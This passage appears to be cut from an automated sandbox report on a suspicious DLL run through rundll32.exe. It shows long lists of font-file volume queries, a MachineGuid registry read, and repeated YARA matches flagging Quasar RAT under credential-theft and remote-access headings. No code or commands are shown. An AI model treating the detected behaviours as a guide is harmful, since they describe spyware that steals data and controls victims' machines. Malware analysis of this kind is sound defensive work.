                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Quasar RAT
                        Source: Yara matchFile source: vstdlib_s64.dll.dll, type: SAMPLE
                        Source: Yara matchFile source: 13.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.1fbe5a90000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1c4bec00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.2755e650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.2caf50d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.24c76550000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.19d796c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.1e0a1960000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.2596ef30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.1d54ab70000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.23d3f970000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.1dd420a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.2d2ec850000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.13f23770000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.24f7dfe0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.20471360000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.1edf6db0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.2a89aaa0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.1711858916.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1803940812.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1682910878.000002A89AAA2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1803619460.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1684076753.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1796633648.000001D54AB72000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1801854722.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1684166716.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1795873767.0000019D796C2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1803576304.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1806601416.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1805439876.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1683326542.000002596EF32000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2929241294.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1798302966.0000023D3F972000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1805465891.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1800394851.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1802596768.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1795862473.000002CAF50D2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1795742842.0000013F23772000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1799338023.000001EDF6DB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1794900321.0000024F7DFE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1798309140.000002D2EC852000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2926634464.0000020471362000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1711125446.0000024C76552000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1794101772.000001E0A1962000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1787872788.000001FBE5A92000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 796, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6200, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7112, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7120, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2496, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Quasar RAT
                        Source: Yara matchFile source: vstdlib_s64.dll.dll, type: SAMPLE
                        Source: Yara matchFile source: 13.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.1fbe5a90000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1c4bec00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.2755e650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.2caf50d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.24c76550000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.19d796c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.1e0a1960000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.2596ef30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.1d54ab70000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.23d3f970000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.1dd420a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.2d2ec850000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.13f23770000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.24f7dfe0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.20471360000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.1edf6db0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.2a89aaa0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.1711858916.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1803940812.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1682910878.000002A89AAA2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1803619460.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1684076753.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1796633648.000001D54AB72000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1801854722.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1684166716.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1795873767.0000019D796C2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1803576304.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1806601416.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1805439876.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1683326542.000002596EF32000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2929241294.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1798302966.0000023D3F972000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1805465891.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
